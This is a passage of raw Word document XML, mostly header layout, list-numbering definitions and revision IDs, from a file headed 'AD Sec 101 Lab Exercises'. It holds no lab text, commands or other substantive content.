      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="7A47C347" w14:textId="6004FC8B">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="7E5B2FD2" w14:textId="2D83C549">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="1F0449FA" w14:textId="5CC60619">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="1E7720F1" w14:textId="6F2582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92DC0" w:rsidRDefault="00392DC0" w14:paraId="5275B1FA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00392DC0" w:rsidRDefault="00392DC0" w14:paraId="27DD717D" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00392DC0" w:rsidRDefault="00392DC0" w14:paraId="39A594B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45"/>
      <w:gridCol w:w="8670"/>
      <w:gridCol w:w="345"/>
    </w:tblGrid>
    <w:tr w:rsidR="7668DC7D" w:rsidTr="5E1249AA" w14:paraId="2989A2D8" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="345" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="04A9B01B" w14:textId="5C84E5E3">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="8670" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="2AB938A7" w14:textId="0C19E8F1">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
              <w:sz w:val="56"/>
              <w:szCs w:val="56"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="5E1249AA">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
              <w:sz w:val="56"/>
              <w:szCs w:val="56"/>
            </w:rPr>
            <w:t>AD Sec 101 Lab Exercises</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="345" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="44AC97E3" w14:textId="6771C0C0">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="7668DC7D" w:rsidP="7668DC7D" w:rsidRDefault="7668DC7D" w14:paraId="317F2125" w14:textId="0A0AC4FE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6">
    <w:nsid w:val="39a1f8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527c3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4">
    <w:nsid w:val="2a668f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2fc41e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AA91C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00DE8D86"/>
    <w:lvl w:ilvl="0" w:tplc="F4B463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290EF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662A5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0CBA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90845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0C57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4EE5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3E07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F819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9E5217"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DE068CE"/>
    <w:lvl w:ilvl="0" w:tplc="3076A4F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="139A5558">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="60BECD58">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="294CADFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6B889730">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C184C54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CA92D326">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FCE45BE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3D7E8804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D2BAE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="319A57C4"/>
    <w:lvl w:ilvl="0" w:tplc="83D88F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E6B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40DE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A400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7CAC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E872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7D267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9637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E68E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C3F3474"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="104C8738"/>
    <w:lvl w:ilvl="0" w:tplc="039000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3AAA8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E14F4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8E0D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CAA8F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DC50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0EA2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96FA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D2CDA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B583400"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EC056EE"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA39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FB692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8C2E3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2B013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504D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7AFF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9631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3448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4A031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BEC062A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81F29F1A"/>
    <w:lvl w:ilvl="0" w:tplc="102251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028FF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BC44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A90BC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8B4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A047C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1E07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46A0E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1928B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F42C8EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="995A86CE"/>
    <w:lvl w:ilvl="0" w:tplc="051C70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EE42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33C51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80E4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2C03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DE65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B72F5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28491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A08A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01B4E29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="932469F8"/>
    <w:lvl w:ilvl="0" w:tplc="EFA88C1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BE3A5196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3BFC8274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EAFF06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7CA73BA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0C243504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6C8EE322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2AE7FC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3BFCB706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3A5E669D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D00801A"/>
    <w:lvl w:ilvl="0" w:tplc="0BF882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AA8E5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6AD4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910CD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44DB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864E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66D1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DBCCF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F4FA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AC90964"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFEE69C4"/>
    <w:lvl w:ilvl="0" w:tplc="EB0CC0E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D2C8C2AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EFE2501C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ADF08238">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1E5407EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A1B88B0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7E4CC99A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C2CA7B3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7B0E39A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738F09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="036A41DE"/>
    <w:lvl w:ilvl="0" w:tplc="53623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5EED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0F2D7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F82A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9C18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F6D2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20DA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7C0E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F06E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89673C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26C25478"/>
    <w:lvl w:ilvl="0" w:tplc="09C4EE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35CC0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4449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02CD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2E8C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E68C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9B661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F2A8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3946E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8A1DF3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6CF2F780"/>
    <w:lvl w:ilvl="0" w:tplc="9690836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A0AA1B3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BF7C8C3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6EA29EB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F42FC8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98F6AC9C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E30F71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830A8DD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EEF8555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4E336826"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40AA4452"/>
    <w:lvl w:ilvl="0" w:tplc="4E9885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A02C3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84C3B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68CD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974C6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524CD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50DD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4ED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B5611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E3203E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED4AEA18"/>
    <w:lvl w:ilvl="0" w:tplc="3326ADD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86226B1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253E35D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D2FA454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A52AEA2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D026EB7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BD608A6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26CE5C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BCDCE33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5D87BCF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19EA7804"/>
    <w:lvl w:ilvl="0" w:tplc="B2EA5D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F400B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C820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EC48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3C3F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78F4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6005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90EC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4E67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F6F59E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E022CA8"/>
    <w:lvl w:ilvl="0" w:tplc="AC8292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5C4CB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D0D9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AAE4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D45B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A02B2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C066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7470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C0A6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FAD9F25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1860C7C"/>
    <w:lvl w:ilvl="0" w:tplc="63C4E8D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B8C636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30AFD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E70A7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2E2D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F229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60E5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861A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4AC3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53E8D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6736D852"/>
    <w:lvl w:ilvl="0" w:tplc="5FBC02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96E2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55C8D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829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EC70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C9A6D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2287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3B611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6E69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646E220"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="868639D2"/>
    <w:lvl w:ilvl="0" w:tplc="B94074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97691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A87F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1A884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910F9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074B4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52E3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DC9D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E7CCA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BD68175"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA0683CA"/>
    <w:lvl w:ilvl="0" w:tplc="7F8455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5F6FC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9CCA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3E72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9A25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3694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0EDE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702C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4542F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BFA9D47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7DCB7D2"/>
    <w:lvl w:ilvl="0" w:tplc="A1966E50">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="86AC1CD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1BFE3C64">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="28D01C96">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="11BCC94E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="656A0FEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6BCE547E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CFD4A0A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7CCAEC3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13E722"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEF49D76"/>
    <w:lvl w:ilvl="0" w:tplc="65B66E3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F46F728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3EF8280A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5C6276E6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B77EEC16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BE4C0662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AFEFED2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7E70EEC8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313E5F1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1" w16cid:durableId="1105461665">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1414080913">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1533687067">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="653491866">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1151825217">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="526453806">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="660548616">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="44762588">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="385376659">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="563105846">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1441142191">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1259943232">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1490555444">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1880164490">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1141654293">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="493379888">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1696539479">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1940874004">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="190539353">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1589314757">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="418142357">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1419520961">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="84012668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41A1EE"/>
    <w:rsid w:val="002D248C"/>
    <w:rsid w:val="0032CF7E"/>
    <w:rsid w:val="00392DC0"/>
    <w:rsid w:val="00422CCB"/>
    <w:rsid w:val="004711D1"/>
    <w:rsid w:val="00539548"/>
    <w:rsid w:val="0059B31F"/>
    <w:rsid w:val="00643845"/>
    <w:rsid w:val="00683992"/>
    <w:rsid w:val="006A3C4B"/>
    <w:rsid w:val="006D15E9"/>
    <w:rsid w:val="006F258B"/>
    <w:rsid w:val="007A790E"/>
    <w:rsid w:val="007E2F3E"/>
    <w:rsid w:val="00854A58"/>
    <w:rsid w:val="008768C7"/>
    <w:rsid w:val="009D457E"/>
    <w:rsid w:val="00B25B89"/>
    <w:rsid w:val="00BE4907"/>
    <w:rsid w:val="00CECC7F"/>
    <w:rsid w:val="00E27336"/>
    <w:rsid w:val="00F22DEF"/>
    <w:rsid w:val="0140AF82"/>
    <w:rsid w:val="01718BE6"/>
    <w:rsid w:val="0222F6F4"/>
    <w:rsid w:val="0233EBDD"/>
    <w:rsid w:val="038D468E"/>
    <w:rsid w:val="03FA3B36"/>
    <w:rsid w:val="040DFF12"/>
    <w:rsid w:val="040FE182"/>
    <w:rsid w:val="045AF3C1"/>
    <w:rsid w:val="04AD3E7F"/>
    <w:rsid w:val="04DE9C56"/>
    <w:rsid w:val="054303C0"/>
    <w:rsid w:val="05DAF3AC"/>
    <w:rsid w:val="0741A1EE"/>
    <w:rsid w:val="07424268"/>
    <w:rsid w:val="07C9BD64"/>
    <w:rsid w:val="082FBA6D"/>
    <w:rsid w:val="08FA1682"/>
    <w:rsid w:val="09082E11"/>
    <w:rsid w:val="09962F36"/>
    <w:rsid w:val="09D11D43"/>
    <w:rsid w:val="0A69274D"/>
    <w:rsid w:val="0AA08D50"/>
    <w:rsid w:val="0AB20C1F"/>
    <w:rsid w:val="0B11C0CC"/>
    <w:rsid w:val="0B2DDF8D"/>
    <w:rsid w:val="0BB73243"/>
    <w:rsid w:val="0C29EB10"/>
    <w:rsid w:val="0CFFAFB8"/>
    <w:rsid w:val="0D7351E7"/>
    <w:rsid w:val="0E04265D"/>
    <w:rsid w:val="0E4B51FB"/>
    <w:rsid w:val="0E89A047"/>
    <w:rsid w:val="0ED9317F"/>
    <w:rsid w:val="0EFDD4CC"/>
    <w:rsid w:val="0F125C49"/>
    <w:rsid w:val="0F5F1CE1"/>
    <w:rsid w:val="0F6602D7"/>
    <w:rsid w:val="1090C73F"/>
    <w:rsid w:val="1093937A"/>
    <w:rsid w:val="10C75523"/>
    <w:rsid w:val="11007A5B"/>
    <w:rsid w:val="1178369E"/>
    <w:rsid w:val="124E98CB"/>
    <w:rsid w:val="1311C361"/>
    <w:rsid w:val="134C083D"/>
    <w:rsid w:val="137A6DD7"/>
    <w:rsid w:val="138D41A5"/>
    <w:rsid w:val="1393E269"/>
    <w:rsid w:val="144F153A"/>
    <w:rsid w:val="148509BA"/>
    <w:rsid w:val="153B784D"/>
    <w:rsid w:val="15533FC9"/>
    <w:rsid w:val="15B7EFE4"/>
    <w:rsid w:val="16CDA6DC"/>
    <w:rsid w:val="16EB9444"/>
    <w:rsid w:val="1753BE3C"/>
    <w:rsid w:val="178F3B02"/>
    <w:rsid w:val="17B080EF"/>
    <w:rsid w:val="184503B7"/>
    <w:rsid w:val="1891C9A4"/>
    <w:rsid w:val="18A56255"/>
    <w:rsid w:val="18A779E7"/>
    <w:rsid w:val="18B4A6A3"/>
    <w:rsid w:val="18D15F47"/>
    <w:rsid w:val="18D85688"/>
    <w:rsid w:val="19C4B7B7"/>
    <w:rsid w:val="1A07687A"/>
    <w:rsid w:val="1AD801DB"/>
    <w:rsid w:val="1AE7C564"/>
    <w:rsid w:val="1AF1C1CF"/>
    <w:rsid w:val="1B33DE88"/>
    <w:rsid w:val="1B407B73"/>
    <w:rsid w:val="1B4C8156"/>
    <w:rsid w:val="1BF0BABC"/>
    <w:rsid w:val="1BFEACF0"/>
    <w:rsid w:val="1C76FB1C"/>
    <w:rsid w:val="1CC0628C"/>
    <w:rsid w:val="1D192AA7"/>
    <w:rsid w:val="1D5AC7AC"/>
    <w:rsid w:val="1DA010BD"/>
    <w:rsid w:val="1E149EC1"/>
    <w:rsid w:val="1E7E005E"/>
    <w:rsid w:val="1EA2A20B"/>
    <w:rsid w:val="1EBF8A62"/>
    <w:rsid w:val="1F6C2E7D"/>
    <w:rsid w:val="1F81789C"/>
    <w:rsid w:val="203399AF"/>
    <w:rsid w:val="204F1445"/>
    <w:rsid w:val="20A306AA"/>
    <w:rsid w:val="20B00B43"/>
    <w:rsid w:val="20B0CAC6"/>
    <w:rsid w:val="211B064E"/>
    <w:rsid w:val="2159023C"/>
    <w:rsid w:val="21DE86F0"/>
    <w:rsid w:val="226D3BB5"/>
    <w:rsid w:val="2282C93C"/>
    <w:rsid w:val="229F320A"/>
    <w:rsid w:val="2304717E"/>
    <w:rsid w:val="232EA138"/>
    <w:rsid w:val="235BB941"/>
    <w:rsid w:val="23B63042"/>
    <w:rsid w:val="23FD7A7A"/>
    <w:rsid w:val="241191C1"/>
    <w:rsid w:val="241229F0"/>
    <w:rsid w:val="244DABD5"/>
    <w:rsid w:val="248A8B12"/>
    <w:rsid w:val="2524580F"/>
    <w:rsid w:val="25323011"/>
    <w:rsid w:val="258D6DA5"/>
    <w:rsid w:val="25910442"/>
    <w:rsid w:val="25DE4964"/>
    <w:rsid w:val="25FA5FA4"/>
    <w:rsid w:val="261CF51C"/>
    <w:rsid w:val="261F5E6D"/>
    <w:rsid w:val="2661DBD6"/>
    <w:rsid w:val="2677FFF6"/>
    <w:rsid w:val="27C079EF"/>
    <w:rsid w:val="27F58339"/>
    <w:rsid w:val="282ECA2C"/>
    <w:rsid w:val="28D1FE1C"/>
    <w:rsid w:val="2A14CB3B"/>
    <w:rsid w:val="2AABAAF0"/>
    <w:rsid w:val="2AFE837E"/>
    <w:rsid w:val="2B1DBA5C"/>
    <w:rsid w:val="2B322234"/>
    <w:rsid w:val="2B3EDE61"/>
    <w:rsid w:val="2B77A9A7"/>
    <w:rsid w:val="2B96A674"/>
    <w:rsid w:val="2C86DBD4"/>
    <w:rsid w:val="2CB7C109"/>
    <w:rsid w:val="2D9C7DAE"/>
    <w:rsid w:val="2DC419B0"/>
    <w:rsid w:val="2DE7BD48"/>
    <w:rsid w:val="2DEB5B86"/>
    <w:rsid w:val="2E8F1BCF"/>
    <w:rsid w:val="2F191775"/>
    <w:rsid w:val="2F4FE295"/>
    <w:rsid w:val="2F85744E"/>
    <w:rsid w:val="2FA1567C"/>
    <w:rsid w:val="3072640B"/>
    <w:rsid w:val="309DAD98"/>
    <w:rsid w:val="30F26F60"/>
    <w:rsid w:val="312912EC"/>
    <w:rsid w:val="313B36DF"/>
    <w:rsid w:val="31FD1D53"/>
    <w:rsid w:val="32AA5668"/>
    <w:rsid w:val="32BF8D88"/>
    <w:rsid w:val="32CD933C"/>
    <w:rsid w:val="32F2D142"/>
    <w:rsid w:val="333771D2"/>
    <w:rsid w:val="333FEE8A"/>
    <w:rsid w:val="3348CB8E"/>
    <w:rsid w:val="339E594E"/>
    <w:rsid w:val="339ECA80"/>
    <w:rsid w:val="339F6623"/>
    <w:rsid w:val="33A0561C"/>
    <w:rsid w:val="33DCA8E8"/>
    <w:rsid w:val="33E615AC"/>
    <w:rsid w:val="34DC29F2"/>
    <w:rsid w:val="3563DF31"/>
    <w:rsid w:val="360D90D6"/>
    <w:rsid w:val="3651978E"/>
    <w:rsid w:val="3669AAE2"/>
    <w:rsid w:val="36AF3931"/>
    <w:rsid w:val="37FCFC6E"/>
    <w:rsid w:val="3848E744"/>
    <w:rsid w:val="385B12AC"/>
    <w:rsid w:val="387341EE"/>
    <w:rsid w:val="38AB9B9F"/>
    <w:rsid w:val="38CD1F91"/>
    <w:rsid w:val="38F0A28D"/>
    <w:rsid w:val="39663FF3"/>
    <w:rsid w:val="39B34AF1"/>
    <w:rsid w:val="3A1517DA"/>
    <w:rsid w:val="3A5E69D7"/>
    <w:rsid w:val="3A81FAA0"/>
    <w:rsid w:val="3B0CBB55"/>
    <w:rsid w:val="3B28D80A"/>
    <w:rsid w:val="3B87E67A"/>
    <w:rsid w:val="3BBD1C00"/>
    <w:rsid w:val="3D13CDA6"/>
    <w:rsid w:val="3D1F3C3A"/>
    <w:rsid w:val="3D60901A"/>
    <w:rsid w:val="3D762FEA"/>
    <w:rsid w:val="3D7DD39B"/>
    <w:rsid w:val="3F0C84D9"/>
    <w:rsid w:val="3F5BB3CD"/>
    <w:rsid w:val="3F5C5BDC"/>
    <w:rsid w:val="3F8C23F5"/>
    <w:rsid w:val="409A1140"/>
    <w:rsid w:val="40A8E45F"/>
    <w:rsid w:val="40C0960F"/>
    <w:rsid w:val="40CEBC5B"/>
    <w:rsid w:val="4135F405"/>
    <w:rsid w:val="4161764A"/>
    <w:rsid w:val="4165E3B5"/>
    <w:rsid w:val="41681EB7"/>
    <w:rsid w:val="426D36AD"/>
    <w:rsid w:val="43042C4A"/>
    <w:rsid w:val="43457A18"/>
    <w:rsid w:val="44E019C2"/>
    <w:rsid w:val="45214B87"/>
    <w:rsid w:val="455EDA41"/>
    <w:rsid w:val="456DC520"/>
    <w:rsid w:val="45721741"/>
    <w:rsid w:val="4596315E"/>
    <w:rsid w:val="45C10518"/>
    <w:rsid w:val="45F30BF5"/>
    <w:rsid w:val="464A1E97"/>
    <w:rsid w:val="467A724F"/>
    <w:rsid w:val="46B0A994"/>
    <w:rsid w:val="47312B7B"/>
    <w:rsid w:val="48214DFD"/>
    <w:rsid w:val="485ACA2C"/>
    <w:rsid w:val="4876A206"/>
    <w:rsid w:val="489CFD90"/>
    <w:rsid w:val="48B8797A"/>
    <w:rsid w:val="4968FA15"/>
    <w:rsid w:val="49E511F9"/>
    <w:rsid w:val="4AA1A9B5"/>
    <w:rsid w:val="4ADE9ADB"/>
    <w:rsid w:val="4AE65F52"/>
    <w:rsid w:val="4AFFFC4A"/>
    <w:rsid w:val="4B54C785"/>
    <w:rsid w:val="4B56EDF8"/>
    <w:rsid w:val="4B7C9CC0"/>
    <w:rsid w:val="4B8B3AB0"/>
    <w:rsid w:val="4BAA541B"/>
    <w:rsid w:val="4C49A73A"/>
    <w:rsid w:val="4CD0BEBC"/>
    <w:rsid w:val="4CF224EA"/>
    <w:rsid w:val="4D4CD107"/>
